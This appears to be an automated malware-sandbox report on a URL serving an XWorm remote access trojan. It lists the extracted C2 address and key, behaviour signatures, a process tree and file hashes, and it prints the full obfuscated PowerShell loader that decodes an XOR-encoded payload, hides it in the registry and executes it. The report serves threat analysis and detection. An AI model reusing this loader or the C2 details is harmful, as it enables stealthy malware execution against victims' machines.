Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
32s -
max time network
34s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
-
submitted
01/03/2025, 19:02
General
-
Target
https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel
Malware Config
Extracted
xworm
5.0
meowycatty.ddns.net:8843
jRccj8SKwN7fQIlB
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 1 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 21 IoCs
-
Suspicious use of SendNotifyMessage 20 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 27180 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {660ac65c-ef4a-4f4e-b3d0-83b132997da8} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28100 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53a05d31-2434-4c28-8547-9697229eac1e} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" socket3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1540 -childID 1 -isForBrowser -prefsHandle 1556 -prefMapHandle 1552 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ac301-cd7a-4aef-9494-948769d4e88b} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3676 -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 32590 -prefMapSize 244628 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31464805-ecb4-4a03-b63e-cdc16ff13e3d} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4260 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 2788 -prefMapHandle 2792 -prefsLen 32590 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1569fc1-b6e7-4c22-922c-0fa7a5f57ebe} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" utility3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5796 -childID 3 -isForBrowser -prefsHandle 5784 -prefMapHandle 5704 -prefsLen 27123 -prefMapSize 244628 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80eb6c41-0aa1-442c-bee9-1a08d2e04b2e} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5804 -childID 4 -isForBrowser -prefsHandle 5748 -prefMapHandle 5756 -prefsLen 27123 -prefMapSize 244628 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ebf7a70-0089-4736-9761-9e238007bd4c} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6028 -childID 5 -isForBrowser -prefsHandle 6016 -prefMapHandle 6128 -prefsLen 27123 -prefMapSize 244628 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1b6e6e4-f83c-4ee4-9600-46948a303307} 3584 "\\.\pipe\gecko-crash-server-pipe.3584" tab3⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\krTVmufRVRif.bat"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:xrDrGAvriu;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path;};$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-loJDe' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
7KB
MD57e8617606590cbab2daaa7a00e0dcb56
SHA14f87549f8cc0c2c60ca2379bcddc1e7dcfcdaa07
SHA2569e607dde1d9df635647f381e65b31072841c8d89bdd74cc9617b5c85d33e2c4c
SHA5129d95fc9e590671e6869b73c0c41fe806db664f3191fa9c5ef54d75d78aa850579b6b6ddf93a48a84503a82205a416b130a7b87757e9d9c47560abf8d34f4bb10
-
Filesize
10KB
MD5a75aad7ec7654cf2956d618f4b977394
SHA1d420da9adbc43ce781d088bcc281fa90990cc8eb
SHA25656c5dfc29fe7939fdbe40bff98d8c5ba7d970bd99b4e64e7a68d83f12c6882b1
SHA5126492dc7c10b7e7a3ea98afe886ed3e212b76f969e297fd0d8934cd4f8717b37a5d041fdde4d67e9d3f62df40e24524bb55e55e36b6a68097430bec02fe5b5d4a
-
Filesize
5KB
MD578684cc91f38c73224832b183cb7e805
SHA14e114abf55aa9c64424bb2c791aa597a86950a1a
SHA25607406305703bf2c920f1303f92ad87c884514fa2df69845438c3da114f663f51
SHA512f9c18046e83b957ede32552724f43610fc9dff32448348039438dbc3cd4a5d938950ac430096bccdaa25f28f7fc7fa7bf9279e3a03bfe7cd5a82ccb7164bd729
-
Filesize
6KB
MD561592f447ab08a958a4e8988f96a75ca
SHA1d8eeb2f9967f94b2ff781ac29b491caba1f6741b
SHA256364d3b2c56d733a234769e455ec3b797b126865e64d36f2b9c7f7d24e7a55fa6
SHA512168bc5f437cc4f45c5c5c53247421a98b9e07ae87194007b8f899bf8512d6a1adea094a831074be4a38820260c3055c479496ace18622e566576b52a5ee0bfac
-
Filesize
6KB
MD53af37566bf4ed1d4b742750a11359759
SHA119cb6e0ba6d10b75cb8b58e645326f4453b8fc6e
SHA2563cf026a6d0117585c4a1a26493c2b61c038803dd635eb49f6092886e4fff51c3
SHA5123c3628fd546689587df5d9283645b06b8ebc7f3b69089b62acc456f17ad8da214b007a3fac1aafb5e31ef1205ab314604a70d5adacede9c592fa21eac9fb8cde
-
Filesize
671B
MD5a4e29f0151cd9a4853b9391a6fe04911
SHA1dd62ba8dfd7b712b41347ba998a2f90de2ceb545
SHA2568f6067c50ec6ec6eb78623059d319d1dd352ffe8c940a6cbc6af0ca79c7c165a
SHA512a734c271fa5d36835ab1f66351d1889f4ecdcc61bc53b5803eedeb419e43337023ee0c0282ce4d5a7401ea7ff59c6bf6aed031393feed536d43a1d71c601da15
-
Filesize
26KB
MD5f5afeafe431b633a2b3ec6ac5b9444bb
SHA1139bd2fea5c50d5a8e62b46ebb269b1f811c4dc6
SHA256d672d61954134a7a9dff07427148355b07ed4c380d47783ffdd40dd3ddc78a3d
SHA512f5122b135fde161ba2dadf847b658dac40aaf523fad92584213650752903a18968cbd75c8d37e09780154402b7da6afaa618b84643f157713070459dccea1b5d
-
Filesize
982B
MD5c325dc8606dd696c471eaa4d50fb1238
SHA17e31d10255d220e21d011b34fbf85fe1776770ae
SHA2569f3737301077409e2bc44033ca71cd5e1c0e365c6d0f742e77ec0a729c5e8b4d
SHA51206cece19f7fcd06c81a3812c2d3c94ec4840de4d1b06781d833c00d20107e48d7d875ba02851ec913969c47671527259027ca8b948df830d17444335fb49a427
-
Filesize
1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
Filesize
116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
Filesize
10KB
MD5b2380be92fca458466f44aa0b84f8007
SHA120b2f0004e2c29a69e22f5d63d2268ae0d7be131
SHA2560aba1ea0dde7057e8c3a3b137da561dde664329a0104dff77168c57586aa922e
SHA51243e00fd105ef5ed17571f16bd937e5356cf949e3f6752c6ea7455371370890273c4f2a4b6380936d80f8eff896cd949b95cd2358b66db98170bd7a28af2c34bd
-
Filesize
4.3MB
MD5c475591ab334bd766b868d4d706938db
SHA10e89e12020e858db58b4f8e250c6fea7e03ed95e
SHA25638908b3b24f91dd837b7f3730f9e0258337f26274ce71bc2f299c5662247fcf6
SHA5123611b20c0f2918abb33c7869a3755ad78a274dfaab8c69768bd3e3a8762837dedb8b45c64133133dd6d60b8986ca9cfb0db79c0b27cb9bb4cbd7138f286bc28b
-
Filesize
32KB
-
Filesize
1.2MB
-
Filesize
352KB
-
Filesize
2.0MB
-
Filesize
756KB
-
Filesize
56KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
8KB